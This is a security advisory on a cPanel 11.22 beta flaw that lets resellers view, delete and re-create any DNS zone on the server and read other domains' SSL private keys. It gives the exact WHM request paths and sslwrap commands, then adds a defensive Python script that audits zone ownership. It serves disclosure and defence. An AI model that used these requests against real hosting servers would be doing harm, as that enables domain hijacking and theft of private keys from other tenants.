cPanel 11.22.0-BETA_23297 - delete any zone from /etc/named.conf and /var/named, recreate it under your account, obtain the SSL key for the domain



DESCRIPTION


Resellers could do a number of things with DNS, the most critical of which was removing any zone entry from /etc/named.conf and removing any zone file from /var/named. As a result, the reseller could then recreate the zone under their own account. In the examples below, $dnsuniqid could be any number from 1 to (infinity?) as long as it did not already exist in /var/cpanel/dnsrequests.


Viewing any zone:

GET /scripts2/getzone_local?dnsuniqid=$dnsuniqid&zone=$victim_domain HTTP/1.1

Removing any zone:

GET /scripts2/removezone_local?dnsuniqid=$dnsuniqid&zone=$victim_domain HTTP/1.1

Adding the zone:

GET /scripts/adddns?ip=$a_record&zone=$victim_domain HTTP/1.1



After adding the zone, you needed to update /etc/userdomains to remove the previous entry for the victim domain. This was done by simply editing one of the local packages for your reseller account. Note that you did not actually need to edit a package; just sending the request below made WHM think you had edited the package and were now saving it.

GET /scripts2/addpkg?edit=yes&name=$package



Now you could edit the zone from within WHM. As an added bonus, you could use sslwrap to see if there was an SSL key installed for the domain.

[user@host ~]$ /usr/local/cpanel/bin/sslwrap LIST example.com key
example.com



If a key existed, you could view it.

[user@host ~]$ /usr/local/cpanel/bin/sslwrap FETCH example.com key
-----BEGIN RSA PRIVATE KEY-----
[key material omitted]
-----END RSA PRIVATE KEY-----



Other nasty things could be done, such as constantly reloading BIND on the host.



IMPACT


Local users could remove all DNS zones on the server with blinding speed, and without this being logged to /usr/local/cpanel/logs/access_log (there was, however, information written to /usr/local/cpanel/logs/error_log). Local users could take control of any zone on the server. Local users could view the SSL private keys belonging to other domains on the server.
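Because the zone removal left no trace in access_log, the practical defence on the host side is an integrity audit that compares the zones declared in /etc/named.conf and the files in /var/named against the ownership records in /etc/userdomains, and raises an alert when a zone disappears or changes owner between two snapshots. The script below is an added example written for this page, not cPanel code; it assumes /etc/userdomains uses the "domain: user" line format and that zone files are named /var/named/<zone>.db, and all inputs are constructed inline.

```python
"""Integrity audit for cPanel-managed BIND zones (added example, not cPanel code).

Assumptions (not taken from the advisory):
  * /etc/userdomains lines look like "domain: user" (plus a "*: nobody" catch-all).
  * The zone file for <zone> lives at /var/named/<zone>.db.
"""
import re
from typing import Dict, List, Optional, Set

# Matches 'zone "example.com" {' lines in named.conf.
ZONE_RE = re.compile(r'^\s*zone\s+"([^"]+)"', re.MULTILINE)


def parse_named_conf(text: str) -> Set[str]:
    """Return the set of zone names declared in a named.conf body."""
    return {z.lower().rstrip(".") for z in ZONE_RE.findall(text)}


def parse_userdomains(text: str) -> Dict[str, str]:
    """Map domain -> owning account from /etc/userdomains ('domain: user' lines)."""
    owners: Dict[str, str] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or ":" not in line:
            continue
        domain, user = line.split(":", 1)
        domain = domain.strip().lower()
        if domain == "*":  # catch-all entry, not a real zone
            continue
        owners[domain] = user.strip()
    return owners


def audit_zones(named_conf: str, userdomains: str, var_named_files: List[str],
                previous_owners: Optional[Dict[str, str]] = None) -> List[str]:
    """Report zones that vanished from named.conf or /var/named, or changed owner.

    previous_owners is the parse_userdomains() result from the last snapshot;
    it is what turns a silent re-creation under another account into an alert.
    """
    findings: List[str] = []
    declared = parse_named_conf(named_conf)
    owners = parse_userdomains(userdomains)
    files = {f.lower() for f in var_named_files}

    for domain, user in sorted(owners.items()):
        if domain not in declared:
            findings.append(f"MISSING_ZONE_ENTRY {domain} (owner {user}) not in named.conf")
        if f"{domain}.db" not in files:
            findings.append(f"MISSING_ZONE_FILE {domain} has no /var/named/{domain}.db")
        if previous_owners and domain in previous_owners and previous_owners[domain] != user:
            findings.append(f"OWNER_CHANGED {domain}: {previous_owners[domain]} -> {user}")

    for zone in sorted(declared - set(owners)):
        findings.append(f"ORPHAN_ZONE {zone} declared in named.conf but absent from userdomains")
    return findings


# Constructed sample snapshots (not real server data).
NAMED_CONF_OK = '''
zone "example.com" { type master; file "/var/named/example.com.db"; };
zone "victim.example" { type master; file "/var/named/victim.example.db"; };
zone "reseller.example" { type master; file "/var/named/reseller.example.db"; };
'''
NAMED_CONF_REMOVED = '''
zone "example.com" { type master; file "/var/named/example.com.db"; };
zone "reseller.example" { type master; file "/var/named/reseller.example.db"; };
'''
USERDOMAINS_BEFORE = "example.com: alice\nvictim.example: alice\nreseller.example: bob\n*: nobody\n"
USERDOMAINS_RETAKEN = "example.com: alice\nvictim.example: bob\nreseller.example: bob\n*: nobody\n"
FILES_OK = ["example.com.db", "victim.example.db", "reseller.example.db"]
FILES_REMOVED = ["example.com.db", "reseller.example.db"]


def run_demo() -> Dict[str, List[str]]:
    """Run the audit over the two constructed scenarios and return the findings."""
    baseline = parse_userdomains(USERDOMAINS_BEFORE)
    return {
        # Zone deleted from named.conf and /var/named, userdomains untouched.
        "removed": audit_zones(NAMED_CONF_REMOVED, USERDOMAINS_BEFORE, FILES_REMOVED, baseline),
        # Zone re-created under another account; files look normal, owner differs.
        "retaken": audit_zones(NAMED_CONF_OK, USERDOMAINS_RETAKEN, FILES_OK, baseline),
    }


if __name__ == "__main__":
    for scenario, findings in run_demo().items():
        print(scenario, findings)
```

Run it from cron with the real files substituted for the constructed strings and persist the parse_userdomains() output between runs; the OWNER_CHANGED finding is the one that catches a zone that was removed and quietly recreated under a reseller's account, which a check of named.conf alone would not see.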